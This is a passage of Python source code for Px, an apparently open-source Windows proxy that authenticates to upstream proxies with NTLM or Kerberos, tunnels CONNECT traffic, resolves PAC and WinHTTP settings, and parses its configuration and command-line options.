break
# Headers
dprint("Reading response headers")
while not State.exit:
line = self.proxy_fp.readline(State.max_line).decode("utf-8")
if line == b"":
if self.proxy_socket:
self.proxy_socket.close()
self.proxy_socket = None
dprint("Proxy closed connection: %s" % resp.code)
return Response(444)
if line == "\r\n":
break
nv = line.split(":", 1)
if len(nv) != 2:
dprint("Bad header =>%s<=" % line)
continue
name = nv[0].strip()
value = nv[1].strip()
resp.headers.append((name, value))
if name.lower() != "proxy-authenticate":
dprint("Received %s: %s" % (name, value))
else:
dprint("Received %s: sanitized (%d)" % (name, len(value)))
if name.lower() == "content-length":
resp.length = int(value)
if not resp.length:
resp.body = False
elif name.lower() == "transfer-encoding" and value.lower() == "chunked":
resp.chunked = True
resp.body = True
elif name.lower() in ["proxy-connection", "connection"] and value.lower() == "close":
resp.close = True
return resp
def do_proxy_type(self):
# Connect to proxy
if not hasattr(self, "proxy_address"):
if not self.do_socket_connect():
return Response(408), None
State.proxy_type_lock.acquire()
try:
# Read State.proxy_type only once and use value for function return if it is not None;
# State.proxy_type should only be read here to avoid getting None after successfully
# identifying the proxy type if another thread clears it with load_proxy
proxy_type = State.proxy_type.get(self.proxy_address)
if proxy_type is None:
# New proxy, don't know type yet
dprint("Searching proxy type")
resp = self.do_socket()
proxy_auth = ""
for header in resp.headers:
if header[0] == "Proxy-Authenticate":
proxy_auth += header[1] + " "
if "NTLM" in proxy_auth.upper():
proxy_type = "NTLM"
elif "KERBEROS" in proxy_auth.upper():
proxy_type = "KERBEROS"
elif "NEGOTIATE" in proxy_auth.upper():
proxy_type = "NEGOTIATE"
if proxy_type is not None:
# Writing State.proxy_type only once but use local variable as return value to avoid
# losing the query result (for the current request) by clearing State.proxy_type in load_proxy
State.proxy_type[self.proxy_address] = proxy_type
dprint("Auth mechanisms: " + proxy_auth)
dprint("Selected: " + str(self.proxy_address) + ": " + str(proxy_type))
return resp, proxy_type
return Response(407), proxy_type
finally:
State.proxy_type_lock.release()
def do_transaction(self):
dprint("Entering")
ipport = self.get_destination()
if ipport not in [False, True]:
dprint("Skipping NTLM proxying")
resp = self.do_socket(destination=ipport)
elif ipport:
# Get the proxy type directly from do_proxy_type instead of accessing State.proxy_type, to avoid
# a race condition with clearing State.proxy_type in load_proxy which sometimes led to a proxy type
# of None (clearing State.proxy_type in one thread was done after another thread's do_proxy_type but
# before accessing State.proxy_type in the second thread)
resp, proxy_type = self.do_proxy_type()
if resp.code == 407:
# Unknown auth mechanism
if proxy_type is None:
dprint("Unknown auth mechanism expected")
return resp
# Generate auth message
ntlm = NtlmMessageGenerator(proxy_type, self.proxy_address[0])
ntlm_resp = ntlm.get_response()
if ntlm_resp is None:
dprint("Bad NTLM response")
return Response(503)
self.fwd_data(resp, flush=True)
# Send auth message
resp = self.do_socket({
"Proxy-Authorization": "%s %s" % (proxy_type, ntlm_resp)
})
if resp.code == 407:
dprint("Auth required")
ntlm_challenge = ""
for header in resp.headers:
if header[0] == "Proxy-Authenticate" and proxy_type in header[1].upper():
h = header[1].split()
if len(h) == 2:
ntlm_challenge = h[1]
break
if ntlm_challenge:
dprint("Challenged")
ntlm_resp = ntlm.get_response(ntlm_challenge)
if ntlm_resp is None:
dprint("Bad NTLM response")
return Response(503)
self.fwd_data(resp, flush=True)
# Reply to challenge
resp = self.do_socket({
"Proxy-Authorization": "%s %s" % (proxy_type, ntlm_resp)
})
else:
dprint("Didn't get challenge, auth didn't work")
else:
dprint("No auth required cached")
else:
dprint("No auth required")
else:
dprint("No proxy server specified and not in noproxy list")
return Response(501)
return resp
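# The proxy authentication handshake implemented in do_transaction() above,
# summarized (the token contents depend on the NTLM/Kerberos/Negotiate backend):
# 1. forward the request; the proxy answers 407 with Proxy-Authenticate
# 2. resend with Proxy-Authorization carrying the initial auth token
# 3. if the proxy answers 407 again with a challenge, resend once more with
# the response to that challenge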
def do_HEAD(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PAC(self):
resp = Response(404)
if State.proxy_mode == MODE_PAC and "file://" in State.pac:
pac = file_url_to_local_path(State.pac)
dprint(pac)
try:
resp.code = 200
with open(pac) as p:
resp.data = p.read().encode("utf-8")
resp.body = True
resp.headers = [
("Content-Length", len(resp.data)),
("Content-Type", "application/x-ns-proxy-autoconfig")
]
except:
traceback.print_exc(file=sys.stdout)
return resp
def do_GET(self):
dprint("Entering")
dprint("Path = " + self.path)
if "/PxPACFile.pac" in self.path:
resp = self.do_PAC()
else:
resp = self.do_transaction()
if resp.code >= 400:
dprint("Error %d" % resp.code)
self.send_error(resp.code)
else:
self.fwd_resp(resp)
dprint("Done")
def do_POST(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PUT(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_DELETE(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PATCH(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_CONNECT(self):
dprint("Entering")
cl = 0
cs = 0
resp = self.do_transaction()
if resp.code >= 400:
dprint("Error %d" % resp.code)
self.send_error(resp.code)
else:
# The proxy connection may already be closed due to a (Proxy-)Connection: close
# header received from the proxy -> forward this to the client
if self.proxy_socket is None:
dprint("Proxy connection closed")
self.send_response(200, "True")
self.send_header("Proxy-Connection", "close")
self.end_headers()
else:
dprint("Tunneling through proxy")
self.send_response(200, "Connection established")
self.send_header("Proxy-Agent", self.version_string())
self.end_headers()
# Sockets are removed from these lists when the remote host is detected to have closed them;
# wlist contains sockets only while there is data to be written
rlist = [self.connection, self.proxy_socket]
wlist = []
# data to be written to client connection and proxy socket respectively
cdata = []
sdata = []
idle = State.config.getint("settings", "idle")
max_idle = time.time() + idle
while not State.exit and (rlist or wlist):
(ins, outs, exs) = select.select(rlist, wlist, rlist, idle)
if exs:
break
if ins:
for i in ins:
if i is self.proxy_socket:
out = self.connection
wdata = cdata
source = "proxy"
else:
out = self.proxy_socket
wdata = sdata
source = "client"
data = i.recv(4096)
if data:
cl += len(data)
# Prepare data to send it later in the outs section
wdata.append(data)
if out not in outs:
outs.append(out)
max_idle = time.time() + idle
else:
# No data means connection closed by remote host
dprint("Connection closed by %s" % source)
# Because tunnel is closed on one end there is no need to read from both ends
rlist.clear()
# Do not write anymore to the closed end
if i in wlist:
wlist.remove(i)
if i in outs:
outs.remove(i)
if outs:
for o in outs:
if o is self.proxy_socket:
wdata = sdata
else:
wdata = cdata
data = wdata[0]
# socket.send() may send only part of the data (as the documentation says),
# so make sure all of it eventually gets written
bsnt = o.send(data)
if bsnt > 0:
if bsnt < len(data):
# Not all data was sent; store the unsent data and ensure select() gets it
# when the socket can be written again
wdata[0] = data[bsnt:]
if o not in wlist:
wlist.append(o)
else:
wdata.pop(0)
if not wdata and o in wlist:
wlist.remove(o)
cs += bsnt
else:
dprint("No data sent")
max_idle = time.time() + idle
if max_idle < time.time():
# No data in timeout seconds
dprint("Proxy connection timeout")
break
# After serving the proxy tunnel it cannot be used for anything else.
# A proxy doesn't really know when a tunnel is no longer needed (there is no content length for the data).
# So serving ends either after the idle timeout without data transfer or
# when at least one side closes the connection.
# Close both proxy and client connection if still open.
if self.proxy_socket is not None:
dprint("Cleanup proxy connection")
self.proxy_socket.close()
self.proxy_socket = None
self.close_connection = True
dprint("%d bytes read, %d bytes written" % (cl, cs))
dprint("Done")
def fwd_data(self, resp, flush=False):
cl = resp.length
dprint("Reading response data")
if resp.body:
if cl:
dprint("Content length %d" % cl)
while cl > 0:
if cl > 4096:
l = 4096
cl -= l
else:
l = cl
cl = 0
d = self.proxy_fp.read(l)
if not flush:
self.wfile.write(d)
elif resp.chunked:
dprint("Chunked encoding")
while not State.exit:
line = self.proxy_fp.readline(State.max_line)
if not flush:
self.wfile.write(line)
line = line.decode("utf-8").strip()
if not len(line):
dprint("Blank chunk size")
break
else:
try:
csize = int(line, 16) + 2
dprint("Chunk of size %d" % csize)
except ValueError:
dprint("Bad chunk size '%s'" % line)
continue
d = self.proxy_fp.read(csize)
if not flush:
self.wfile.write(d)
if csize == 2:
dprint("No more chunks")
break
if len(d) < csize:
dprint("Chunk size doesn't match data")
break
elif resp.data is not None:
dprint("Sending data string")
if not flush:
self.wfile.write(resp.data)
else:
dprint("Not sure how much")
while not State.exit:
time.sleep(0.1)
d = self.proxy_fp.read(1024)
if not flush:
self.wfile.write(d)
if len(d) < 1024:
break
if resp.close and self.proxy_socket:
dprint("Close proxy connection per header")
self.proxy_socket.close()
self.proxy_socket = None
def fwd_resp(self, resp):
dprint("Entering")
self.send_response(resp.code)
for header in resp.headers:
dprint("Returning %s: %s" % (header[0], header[1]))
self.send_header(header[0], header[1])
self.end_headers()
self.fwd_data(resp)
dprint("Done")
def get_destination(self):
netloc = self.path
path = "/"
if self.command != "CONNECT":
parse = urlparse.urlparse(self.path, allow_fragments=False)
if parse.netloc:
netloc = parse.netloc
if ":" not in netloc:
port = parse.port
if not port:
if parse.scheme == "http":
port = 80
elif parse.scheme == "https":
port = 443
elif parse.scheme == "ftp":
port = 21
netloc = netloc + ":" + str(port)
path = parse.path or "/"
if parse.params:
path = path + ";" + parse.params
if parse.query:
path = path + "?" + parse.query
dprint(netloc)
# Check destination for noproxy first, before doing any expensive stuff
# possibly involving connections
if State.noproxy.size:
addr = []
spl = netloc.split(":", 1)
try:
addr = socket.getaddrinfo(spl[0], int(spl[1]))
except socket.gaierror:
# Couldn't resolve, let parent proxy try, #18
dprint("Couldn't resolve host")
if len(addr) and len(addr[0]) == 5:
ipport = addr[0][4]
dprint("%s => %s + %s" % (self.path, ipport, path))
if ipport[0] in State.noproxy:
dprint("Direct connection from noproxy configuration")
self.path = path
return ipport
# Get proxy mode and servers straight from load_proxy to avoid
# threading issues
(proxy_mode, self.proxy_servers) = load_proxy()
if proxy_mode in [MODE_AUTO, MODE_PAC]:
proxy_str = find_proxy_for_url(
("https://" if "://" not in self.path else "") + self.path)
if proxy_str == "DIRECT":
ipport = netloc.split(":")
ipport[1] = int(ipport[1])
dprint("Direct connection from PAC")
self.path = path
return tuple(ipport)
if proxy_str:
dprint("Proxy from PAC = " + str(proxy_str))
# parse_proxy does not modify State.proxy_server any more,
# it returns the proxy server tuples instead, because proxy_str
# contains only the proxy servers for the URL served by this thread
self.proxy_servers = parse_proxy(proxy_str)
return True if self.proxy_servers else False
###
# Multi-processing and multi-threading
def get_host_ips():
localips = [ip[4][0] for ip in socket.getaddrinfo(socket.gethostname(), 80, socket.AF_INET)]
localips.insert(0, "127.0.0.1")
return localips
class PoolMixIn(socketserver.ThreadingMixIn):
def process_request(self, request, client_address):
self.pool.submit(self.process_request_thread, request, client_address)
def verify_request(self, request, client_address):
dprint("Client address: %s" % client_address[0])
if client_address[0] in State.allow:
return True
if State.hostonly and client_address[0] in get_host_ips():
dprint("Host-only IP allowed")
return True
dprint("Client not allowed: %s" % client_address[0])
return False
class ThreadedTCPServer(PoolMixIn, socketserver.TCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
socketserver.TCPServer.__init__(self, server_address,
RequestHandlerClass, bind_and_activate)
try:
# Workaround bad thread naming code in Python 3.6+, fixed in master
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=State.config.getint("settings", "threads"),
thread_name_prefix="Thread")
except:
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=State.config.getint("settings", "threads"))
def print_banner():
pprint("Serving at %s:%d proc %s" % (
State.config.get("proxy", "listen").strip(),
State.config.getint("proxy", "port"),
multiprocessing.current_process().name)
)
if getattr(sys, "frozen", False) != False or "pythonw.exe" in sys.executable:
if State.config.getint("settings", "foreground") == 0:
detach_console()
for section in State.config.sections():
for option in State.config.options(section):
dprint(section + ":" + option + " = " + State.config.get(section, option))
def serve_forever(httpd):
signal.signal(signal.SIGINT, signal.SIG_DFL)
try:
httpd.serve_forever()
except KeyboardInterrupt:
dprint("Exiting")
State.exit = True
httpd.shutdown()
def start_worker(pipeout):
parse_config()
httpd = ThreadedTCPServer(
(State.config.get("proxy", "listen").strip(), State.config.getint("proxy", "port")),
Proxy, bind_and_activate=False
)
mainsock = socket.fromshare(pipeout.recv())
httpd.socket = mainsock
print_banner()
serve_forever(httpd)
def run_pool():
try:
httpd = ThreadedTCPServer((State.config.get("proxy", "listen").strip(),
State.config.getint("proxy", "port")), Proxy)
except OSError as exc:
if "attempt was made" in str(exc):
print("Px failed to start - port in use")
else:
pprint(exc)
return
mainsock = httpd.socket
print_banner()
if hasattr(socket, "fromshare"):
workers = State.config.getint("settings", "workers")
for i in range(workers-1):
(pipeout, pipein) = multiprocessing.Pipe()
p = multiprocessing.Process(target=start_worker, args=(pipeout,))
p.daemon = True
p.start()
while p.pid is None:
time.sleep(1)
pipein.send(mainsock.share(p.pid))
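# The parent serializes its listening socket with mainsock.share(pid) and each
# worker process rebuilds it via socket.fromshare() in start_worker(), so all
# processes accept connections on the same port. These calls are Windows-only,
# hence the hasattr(socket, "fromshare") guard above.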
serve_forever(httpd)
###
# Proxy detection
class WINHTTP_CURRENT_USER_IE_PROXY_CONFIG(ctypes.Structure):
_fields_ = [("fAutoDetect", ctypes.wintypes.BOOL), # "Automatically detect settings"
("lpszAutoConfigUrl", ctypes.wintypes.LPWSTR), # "Use automatic configuration script, Address"
("lpszProxy", ctypes.wintypes.LPWSTR), # "1.2.3.4:5" if "Use the same proxy server for all protocols",
# else advanced "ftp=1.2.3.4:5;http=1.2.3.4:5;https=1.2.3.4:5;socks=1.2.3.4:5"
("lpszProxyBypass", ctypes.wintypes.LPWSTR), # ";"-separated list, "Bypass proxy server for local addresses" adds "<local>"
]
class WINHTTP_AUTOPROXY_OPTIONS(ctypes.Structure):
_fields_ = [("dwFlags", ctypes.wintypes.DWORD),
("dwAutoDetectFlags", ctypes.wintypes.DWORD),
("lpszAutoConfigUrl", ctypes.wintypes.LPCWSTR),
("lpvReserved", ctypes.c_void_p),
("dwReserved", ctypes.wintypes.DWORD),
("fAutoLogonIfChallenged", ctypes.wintypes.BOOL), ]
class WINHTTP_PROXY_INFO(ctypes.Structure):
_fields_ = [("dwAccessType", ctypes.wintypes.DWORD),
("lpszProxy", ctypes.wintypes.LPCWSTR),
("lpszProxyBypass", ctypes.wintypes.LPCWSTR), ]
# Parameters for WinHttpOpen, http://msdn.microsoft.com/en-us/library/aa384098(VS.85).aspx
WINHTTP_NO_PROXY_NAME = 0
WINHTTP_NO_PROXY_BYPASS = 0
WINHTTP_FLAG_ASYNC = 0x10000000
# dwFlags values
WINHTTP_AUTOPROXY_AUTO_DETECT = 0x00000001
WINHTTP_AUTOPROXY_CONFIG_URL = 0x00000002
# dwAutoDetectFlags values
WINHTTP_AUTO_DETECT_TYPE_DHCP = 0x00000001
WINHTTP_AUTO_DETECT_TYPE_DNS_A = 0x00000002
# dwAccessType values
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY = 0
WINHTTP_ACCESS_TYPE_NO_PROXY = 1
WINHTTP_ACCESS_TYPE_NAMED_PROXY = 3
WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY = 4
# Error messages
WINHTTP_ERROR_WINHTTP_UNABLE_TO_DOWNLOAD_SCRIPT = 12167
def winhttp_find_proxy_for_url(url, autodetect=False, pac_url=None, autologon=True):
# Fix issue #51
ACCESS_TYPE = WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY
if WIN_VERSION < 6.3:
ACCESS_TYPE = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY
ctypes.windll.winhttp.WinHttpOpen.restype = ctypes.c_void_p
hInternet = ctypes.windll.winhttp.WinHttpOpen(
ctypes.wintypes.LPCWSTR("Px"),
ACCESS_TYPE, WINHTTP_NO_PROXY_NAME,
WINHTTP_NO_PROXY_BYPASS, WINHTTP_FLAG_ASYNC)
if not hInternet:
dprint("WinHttpOpen failed: " + str(ctypes.GetLastError()))
return ""
autoproxy_options = WINHTTP_AUTOPROXY_OPTIONS()
if pac_url:
autoproxy_options.dwFlags = WINHTTP_AUTOPROXY_CONFIG_URL
autoproxy_options.dwAutoDetectFlags = 0
autoproxy_options.lpszAutoConfigUrl = pac_url
elif autodetect:
autoproxy_options.dwFlags = WINHTTP_AUTOPROXY_AUTO_DETECT
autoproxy_options.dwAutoDetectFlags = WINHTTP_AUTO_DETECT_TYPE_DHCP | WINHTTP_AUTO_DETECT_TYPE_DNS_A
autoproxy_options.lpszAutoConfigUrl = 0
else:
return ""
autoproxy_options.fAutoLogonIfChallenged = autologon
proxy_info = WINHTTP_PROXY_INFO()
# Fix issue #43
ctypes.windll.winhttp.WinHttpGetProxyForUrl.argtypes = [ctypes.c_void_p,
ctypes.wintypes.LPCWSTR, ctypes.POINTER(WINHTTP_AUTOPROXY_OPTIONS),
ctypes.POINTER(WINHTTP_PROXY_INFO)]
ok = ctypes.windll.winhttp.WinHttpGetProxyForUrl(hInternet, ctypes.wintypes.LPCWSTR(url),
ctypes.byref(autoproxy_options), ctypes.byref(proxy_info))
if not ok:
error = ctypes.GetLastError()
dprint("WinHttpGetProxyForUrl error %s" % error)
if error == WINHTTP_ERROR_WINHTTP_UNABLE_TO_DOWNLOAD_SCRIPT:
dprint("Could not download PAC file, trying DIRECT instead")
return "DIRECT"
return ""
if proxy_info.dwAccessType == WINHTTP_ACCESS_TYPE_NAMED_PROXY:
# Note: proxy_info.lpszProxyBypass makes no sense here!
if not proxy_info.lpszProxy:
dprint('WinHttpGetProxyForUrl named proxy without name')
return ""
return proxy_info.lpszProxy.replace(" ", ",").replace(";", ",").replace(",DIRECT", "") # Note: We only see the first!
if proxy_info.dwAccessType == WINHTTP_ACCESS_TYPE_NO_PROXY:
return "DIRECT"
# WinHttpCloseHandle()
dprint("WinHttpGetProxyForUrl accesstype %s" % (proxy_info.dwAccessType,))
return ""
def file_url_to_local_path(file_url):
parts = urlparse.urlparse(file_url)
path = urlparse.unquote(parts.path)
if path.startswith('/') and not path.startswith('//'):
if len(parts.netloc) == 2 and parts.netloc[1] == ':':
return parts.netloc + path
return 'C:' + path
if len(path) > 2 and path[1] == ':':
return path
def load_proxy(quiet=False):
# Return if proxies specified in Px config
if State.proxy_mode == MODE_CONFIG:
return (State.proxy_mode, State.proxy_server)
# Do locking to avoid updating globally shared State object by multiple
# threads simultaneously
State.proxy_mode_lock.acquire()
try:
proxy_mode = State.proxy_mode
proxy_servers = State.proxy_server
# Check if need to refresh
if (State.proxy_refresh is not None and
time.time() - State.proxy_refresh <
State.config.getint("settings", "proxyreload")):
if not quiet:
dprint("Skip proxy refresh")
return (proxy_mode, proxy_servers)
# Start with clean proxy mode and server list
proxy_mode = MODE_NONE
proxy_servers = []
# Get proxy info from Internet Options
ie_proxy_config = WINHTTP_CURRENT_USER_IE_PROXY_CONFIG()
ok = ctypes.windll.winhttp.WinHttpGetIEProxyConfigForCurrentUser(ctypes.byref(ie_proxy_config))
if not ok:
if not quiet:
dprint(ctypes.GetLastError())
else:
if ie_proxy_config.fAutoDetect:
proxy_mode = MODE_AUTO
elif ie_proxy_config.lpszAutoConfigUrl:
State.pac = ie_proxy_config.lpszAutoConfigUrl
proxy_mode = MODE_PAC
if not quiet:
dprint("AutoConfigURL = " + State.pac)
else:
# Manual proxy
proxies = []
proxies_str = ie_proxy_config.lpszProxy or ""
for proxy_str in proxies_str.lower().replace(' ', ';').split(';'):
if '=' in proxy_str:
scheme, proxy = proxy_str.split('=', 1)
if scheme.strip() != "ftp":
proxies.append(proxy)
elif proxy_str:
proxies.append(proxy_str)
if proxies:
proxy_servers = parse_proxy(",".join(proxies))
proxy_mode = MODE_MANUAL
# Proxy exceptions into noproxy
bypass_str = ie_proxy_config.lpszProxyBypass or "" # FIXME: Handle "<local>"
bypasses = [h.strip() for h in bypass_str.lower().replace(' ', ';').split(';')]
for bypass in bypasses:
try:
ipns = netaddr.IPGlob(bypass)
State.noproxy.add(ipns)
if not quiet:
dprint("Noproxy += " + bypass)
except:
State.noproxy_hosts.append(bypass)
if not quiet:
dprint("Noproxy hostname += " + bypass)
State.proxy_refresh = time.time()
if not quiet:
dprint("Proxy mode = " + str(proxy_mode))
State.proxy_mode = proxy_mode
State.proxy_server = proxy_servers
# Clear proxy types on proxy server update
State.proxy_type = {}
finally:
State.proxy_mode_lock.release()
return (proxy_mode, proxy_servers)
def find_proxy_for_url(url):
proxy_str = ""
if State.proxy_mode == MODE_AUTO:
proxy_str = winhttp_find_proxy_for_url(url, autodetect=True)
elif State.proxy_mode == MODE_PAC:
pac = State.pac
if "file://" in State.pac:
host = State.config.get("proxy", "listen") or "localhost"
port = State.config.getint("proxy", "port")
pac = "http://%s:%d/PxPACFile.pac" % (host, port)
dprint("PAC URL is local: " + pac)
proxy_str = winhttp_find_proxy_for_url(url, pac_url=pac)
# Handle edge case if the result is a list that starts with DIRECT. Assume
# everything should be direct as the string DIRECT is tested explicitly in
# get_destination
if proxy_str.startswith("DIRECT,"):
proxy_str = "DIRECT"
dprint("Proxy found: " + proxy_str)
return proxy_str
###
# Parse settings and command line
def parse_proxy(proxystrs):
if not proxystrs:
return []
servers = []
for proxystr in [i.strip() for i in proxystrs.split(",")]:
pserver = [i.strip() for i in proxystr.split(":")]
if len(pserver) == 1:
pserver.append(80)
elif len(pserver) == 2:
try:
pserver[1] = int(pserver[1])
except ValueError:
pprint("Bad proxy server port: " + pserver[1])
sys.exit()
else:
pprint("Bad proxy server definition: " + proxystr)
sys.exit()
if tuple(pserver) not in servers:
servers.append(tuple(pserver))
return servers
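# A small illustrative example of the mapping implemented above (hypothetical
# host names; port defaults to 80 when none is given, duplicates are dropped):
# parse_proxy("proxy1.example.com:8080, proxy2.example.com")
# -> [("proxy1.example.com", 8080), ("proxy2.example.com", 80)]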
def parse_ip_ranges(iprangesconfig):
ipranges = netaddr.IPSet([])
iprangessplit = [i.strip() for i in iprangesconfig.split(",")]
for iprange in iprangessplit:
if not iprange:
continue
try:
if "-" in iprange:
spl = iprange.split("-", 1)
ipns = netaddr.IPRange(spl[0], spl[1])
elif "*" in iprange:
ipns = netaddr.IPGlob(iprange)
else:
ipns = netaddr.IPNetwork(iprange)
ipranges.add(ipns)
except:
pprint("Bad IP definition: %s" % iprangesconfig)
sys.exit()
return ipranges
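# Accepted forms for each comma-separated entry, per the branches above
# (addresses are hypothetical):
# "10.0.0.1-10.0.0.20" -> netaddr.IPRange
# "10.0.0.*" -> netaddr.IPGlob
# "10.0.0.0/24" -> netaddr.IPNetwork (a plain IP also parses as a /32 network)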
def parse_allow(allow):
State.allow = parse_ip_ranges(allow)
def parse_noproxy(noproxy):
State.noproxy = parse_ip_ranges(noproxy)
def set_useragent(useragent):
State.useragent = useragent
def set_username(username):
ud = username.split("\\")
if len(ud) == 2:
State.username = ud[1]
State.domain = ud[0]
else:
State.username = username
def cfg_int_init(section, name, default, override=False):
val = default
if not override:
try:
val = State.config.get(section, name).strip()
except configparser.NoOptionError:
pass
try:
val = int(val)
except ValueError:
pprint("Invalid integer value for " + section + ":" + name)
State.config.set(section, name, str(val))
def cfg_float_init(section, name, default, override=False):
val = default
if not override:
try:
val = State.config.get(section, name).strip()
except configparser.NoOptionError:
pass
try:
val = float(val)
except ValueError:
pprint("Invalid float value for " + section + ":" + name)
State.config.set(section, name, str(val))
def cfg_str_init(section, name, default, proc=None, override=False):
val = default
if not override:
try:
val = State.config.get(section, name).strip()
except configparser.NoOptionError:
pass
State.config.set(section, name, val)
if proc != None:
proc(val)
def save():
with open(State.ini, "w") as cfgfile:
State.config.write(cfgfile)
pprint("Saved config to " + State.ini + "\n")
with open(State.ini, "r") as cfgfile:
sys.stdout.write(cfgfile.read())
sys.exit()
def parse_config():
if "--debug" in sys.argv:
State.logger = Log(dfile(), "w")
if getattr(sys, "frozen", False) != False or "pythonw.exe" in sys.executable:
attach_console()
if "-h" in sys.argv or "--help" in sys.argv:
pprint(HELP)
sys.exit()
# Load configuration file
State.config = configparser.ConfigParser()
State.ini = os.path.join(os.path.dirname(get_script_path()), State.ini)
for i in range(len(sys.argv)):
if "=" in sys.argv[i]:
val = sys.argv[i].split("=")[1]
if "--config=" in sys.argv[i]:
State.ini = val
if not os.path.exists(val) and "--save" not in sys.argv:
pprint("Could not find config file: " + val)
sys.exit()
if os.path.exists(State.ini):
State.config.read(State.ini)
# [proxy] section
if "proxy" not in State.config.sections():
State.config.add_section("proxy")
cfg_str_init("proxy", "server", "")
cfg_int_init("proxy", "port", "3128")
cfg_str_init("proxy", "listen", "127.0.0.1")
cfg_str_init("proxy", "allow", "*.*.*.*", parse_allow)
cfg_int_init("proxy", "gateway", "0")
cfg_int_init("proxy", "hostonly", "0")
cfg_str_init("proxy", "noproxy", "", parse_noproxy)
cfg_str_init("proxy", "useragent", "", set_useragent)
cfg_str_init("proxy", "username", "", set_username)
# [settings] section
if "settings" not in State.config.sections():
State.config.add_section("settings")
cfg_int_init("settings", "workers", "2")
cfg_int_init("settings", "threads", "5")
cfg_int_init("settings", "idle", "30")
cfg_float_init("settings", "socktimeout", "20.0")
cfg_int_init("settings", "proxyreload", "60")
cfg_int_init("settings", "foreground", "0")
cfg_int_init("settings", "log", "0" if State.logger is None else "1")
if State.config.get("settings", "log") == "1" and State.logger is None:
State.logger = Log(dfile(), "w")
# Command line flags
for i in range(len(sys.argv)):
if "=" in sys.argv[i]:
val = sys.argv[i].split("=")[1]
if "--proxy=" in sys.argv[i] or "--server=" in sys.argv[i]:
cfg_str_init("proxy", "server", val, None, True)
elif "--listen=" in sys.argv[i]:
cfg_str_init("proxy", "listen", val, None, True)
elif "--port=" in sys.argv[i]:
cfg_int_init("proxy", "port", val, True)
elif "--allow=" in sys.argv[i]:
cfg_str_init("proxy", "allow", val, parse_allow, True)
elif "--noproxy=" in sys.argv[i]:
cfg_str_init("proxy", "noproxy", val, parse_noproxy, True)
elif "--useragent=" in sys.argv[i]:
cfg_str_init("proxy", "useragent", val, set_useragent, True)
elif "--username=" in sys.argv[i]:
cfg_str_init("proxy", "username", val, set_username, True)
else:
for j in ["workers", "threads", "idle", "proxyreload"]:
if "--" + j + "=" in sys.argv[i]:
cfg_int_init("settings", j, val, True)
for j in ["socktimeout"]:
if "--" + j + "=" in sys.argv[i]:
cfg_float_init("settings", j, val, True)
if "--gateway" in sys.argv:
cfg_int_init("proxy", "gateway", "1", True)
if "--hostonly" in sys.argv:
cfg_int_init("proxy", "hostonly", "1", True)
if "--foreground" in sys.argv:
cfg_int_init("settings", "foreground", "1", True)
###
# Dependency propagation
# If gateway mode
if State.config.getint("proxy", "gateway") == 1:
# Listen on all interfaces
cfg_str_init("proxy", "listen", "", None, True)
# If hostonly mode
if State.config.getint("proxy", "hostonly") == 1:
State.hostonly = True
# Listen on all interfaces
cfg_str_init("proxy", "listen", "", None, True)
# If not gateway mode or gateway with default allow rules
if (State.config.getint("proxy", "gateway") == 0 or
(State.config.getint("proxy", "gateway") == 1 and
State.config.get("proxy", "allow") in ["*.*.*.*", "0.0.0.0/0"])):
# Purge allow rules
cfg_str_init("proxy", "allow", "", parse_allow, True)
State.proxy_server = parse_proxy(State.config.get("proxy", "server"))
if "--install" in sys.argv:
install()
elif "--uninstall" in sys.argv:
uninstall()
elif "--quit" in sys.argv:
quit()
elif "--save" in sys.argv:
save()
if State.proxy_server:
State.proxy_mode = MODE_CONFIG
else:
load_proxy(quiet=True)
if State.proxy_mode == MODE_NONE and not State.config.get("proxy", "noproxy"):
pprint("No proxy server or noproxy list defined")
sys.exit()
socket.setdefaulttimeout(State.config.getfloat("settings", "socktimeout"))
###
# Exit related
def quit(force=False):
count = 0
mypids = [os.getpid(), os.getppid()]
for pid in sorted(psutil.pids(), reverse=True):
if pid in mypids:
continue
try:
p = psutil.Process(pid)
if p.exe().lower() == sys.executable.lower():
count += 1
if force:
p.kill()
else:
p.send_signal(signal.CTRL_C_EVENT)
except (psutil.AccessDenied, psutil.NoSuchProcess, PermissionError, SystemError):
pass
except:
traceback.print_exc(file=sys.stdout)
if count != 0:
if force:
sys.stdout.write(".")
else:
sys.stdout.write("Quitting Px ..")
time.sleep(4)
sys.stdout.flush()
quit(True)
else:
if force:
pprint(" DONE")
else:
pprint("Px is not running")
sys.exit()
def handle_exceptions(extype, value, tb):
# Create traceback log
lst = traceback.format_tb(tb, None) + traceback.format_exception_only(extype, value)
tracelog = '\nTraceback (most recent call last):\n' + "%-20s%s\n" % ("".join(lst[:-1]), lst[-1])
if State.logger != None:
pprint(tracelog)
else:
sys.stderr.write(tracelog)
# Save to debug.log
dbg = open(dfile(), 'w')
dbg.write(tracelog)
dbg.close()
###
# Install Px to startup
def get_script_path():
if getattr(sys, "frozen", False) is False:
# Script mode
return os.path.normpath(os.path.join(os.getcwd(), sys.argv[0]))
# Frozen mode
return sys.executable
def get_script_cmd():
spath = get_script_path()
if os.path.splitext(spath)[1].lower() == ".py":
return sys.executable + ' "%s"' % spath
return spath
def check_installed():
ret = True
runkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_READ)
try:
winreg.QueryValueEx(runkey, "Px")
except:
ret = False
winreg.CloseKey(runkey)
return ret
def install():
if check_installed() is False:
runkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)
winreg.SetValueEx(runkey, "Px", 0, winreg.REG_EXPAND_SZ, get_script_cmd())
winreg.CloseKey(runkey)
pprint("Px installed successfully")
else:
pprint("Px already installed")
sys.exit()
def uninstall():
if check_installed() is True:
runkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)
winreg.DeleteValue(runkey, "Px")
winreg.CloseKey(runkey)
pprint("Px uninstalled successfully")
else:
